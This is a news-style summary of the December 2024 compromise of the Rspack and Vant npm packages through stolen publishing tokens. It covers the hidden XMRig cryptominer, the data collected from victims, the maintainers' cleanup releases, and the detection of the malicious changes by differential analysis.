Researchers from Sonatype and Socket identified the XMRig cryptocurrency miner as the malware deployed on affected systems to mine Monero, which was hidden within the compromised packages.

The XMRig binary was downloaded from a GitHub repository and renamed to '/tmp/vant_helper' within the Vant package to obscure its true intent.

The malware not only mined cryptocurrency but also collected geographic location and network details from victims' systems, potentially enabling targeted attacks.

This incident is part of a broader trend of supply chain attacks targeting popular open-source packages, following similar incidents involving platforms like LottieFiles and Ultralytics.

A coordinated attack compromised three npm packages—@rspack/core, @rspack/cli, and Vant—by exploiting stolen npm account tokens, which allowed the publication of malicious versions that installed cryptominers.

Multiple versions of the Vant package, a popular Vue.js UI library with around 46,000 weekly downloads, were found to contain crypto-mining malware, prompting the maintainers to issue a clean update.

Rspack, a JavaScript bundler written in Rust, has significant download numbers, with its core component and CLI tool receiving 394,000 and 145,000 weekly downloads, respectively.

Following the discovery of the attack on December 19, 2024, the maintainers of Rspack and Vant swiftly removed the compromised versions (1.1.7) from the npm registry and released secure updates (1.1.8 for Rspack and 4.9.15 for Vant).

This incident highlights the urgent need for stricter safeguards in package management systems to protect developers from such vulnerabilities, although complete security may remain elusive.

The attackers gained unauthorized access to npm publishing, embedding scripts that transmitted sensitive configuration details, including IP address and location data, to a remote server.

Designed for stealth, the cryptomining process limited CPU usage to 75%, balancing performance with the need to avoid detection.

Differential analysis techniques were employed to identify the malicious changes in the compromised packages, underscoring the importance of such methods in detecting software supply chain attacks.